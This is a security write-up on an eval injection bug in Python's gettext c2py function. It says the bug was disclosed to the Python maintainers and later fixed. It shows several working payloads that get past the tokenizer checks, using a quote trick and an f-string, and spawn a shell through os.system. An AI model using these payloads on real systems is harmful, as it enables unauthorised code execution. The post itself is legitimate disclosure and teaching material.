Is eval safe yet? Arbitrary code execution in Python

TL;DR

Found use of eval in the Python gettext module. Bypassed weak security checks. Gained arbitrary code execution.

Background

In Beyond PEP 8, an excellent talk by Raymond Hettinger, he jokingly comments that namedtouple is implemented using eval (or exec, to be exact), and that it’s defensible given the right circumstances. While this is sometimes true, I figured I’d clone the cpython repository and grep for any usages of eval-like functions.

What caught my attention was the function c2py in the gettext module. The gettext module contains bindings for the gettext system, which is an internationalization and localization system. One of the responsibilities of gettext is to convert between plural forms in different languages. The plural forms for a language are defined using a C-like DSL. The DSL is basically a nested ternary expression with different enumerated outcomes, one for each plural form of the specific language. The variable in the ternary expression is always named n, and represents the count for which a plural form should be returned.

For English, the gettext plural form is written as:

n != 1

The above expression will evaluate to either plural form 0 when n is singular, or 1 when plural. For other languages, several plural forms exist. Take for example Russian:

n % 10 == 1 && n % 100 != 11 ? 0 : n % 10 >= 2 && n % 10 <= 4 && (n % 100 < 10 || n % 100 >= 20) ? 1 : 2

Eval to the rescue

Due to the expressiveness required by this language, writing a parser that evaluates these plural forms is not trivial. We could however try to translate these C-like expressions to Python and throw eval at it. The Russian plural form rewritten in Python would look like this:

(0 if n % 10 == 1 and n % 100 != 11 else (1 if n % 10 >= 2 and n % 10 <= 4 and (n % 100 < 10 or n % 100 >= 20) else 2))

This is exactly what was done in c2py in the gettext module. Just like the name of the function suggests, the C-like syntax is converted to Python, and is subsequently evaluated to a lambda function with eval:

eval('lambda n: int(%s)' % plural)

A valid call to c2py could look something like this:

apples = ['Cox Orange', 'Granny Smith']
["apple", "apples"][gettext.c2py('n != 1')(len(apples))]

"apples"

Security

No one in their right mind would call eval on user input without having the security checks necessary in place. The security checks implemented in c2py makes sure that n is the only allowed variable in the plural expressions. It also does some general input validation, like checking that parentheses are balanced.

My first discovery here was that the validation didn’t prevent expressions that were using n as a function. As long as there is a token that the Python tokenize module classifies as a NAME token with the name n, the security checks will pass. The below code snippet successfully spawned a shell:

gettext.c2py('n()')(lambda: os.system('sh'))

This isn’t really a high risk issue, since the input to the lambda function most likely will be an integer given by some count-logic, and not user input.

Exploitation

Not being able to take the function-call bug any further, I kept investigating ways in which I could break the security checks. After a lot of trial-and-error, I found a way to confuse the Python tokenizer. If our entire input is interpreted as a string, the input should pass the security checks. Furthermore, it doesn’t even have to be a valid string, since the security checks pass even though the tokenizer returns a result with ERRORTOKEN. The following input string will pass the security checks but break during evaluation:

gettext.c2py('"eval(foo) ""')

Next on the agenda is to make sure the invalid string we entered is actually interpreted as a valid expression. Since we’ve bypassed the tokenizer, the code that translates and builds the Python expression will assume that all parentheses are matched. If we insert a left parentheses after the first double quote, and some boolean operator before the empty string, we’ll get a valid expression:

gettext.c2py('"(eval(foo) && ""')(0)

----> 1 gettext.c2py('"(eval(foo) && ""')(0)
   gettext.pyc in <lambda>(n)
   NameError: global name 'foo' is not defined

From here, spawning a shell is trivial. The c2py module imports the os module, so all we need to do to get full access to the host system is

gettext.c2py('"(os.system(\'sh\') & ""')(0)

$

Enter Python 3.7

Giving the tokenizer-based security a second though, I wondered how it would react to the new literal string interpolation introduced in Python 3.7. (Not so) surprisingly, this string gets no special attention by the tokenizer, and calling c2py with an interpolated string just works:

gettext.c2py('f"{os.system(\'sh\')}"')(0)

$

Conclusion

This bug was first disclosed to security@python.org, and later on added to the Python issue tracker due to its low-risk nature. Generally these plural forms are specified in PO files which is an unlikely attack vector.

The issue was resolved by implementing an actual parser for the gettext plural form language.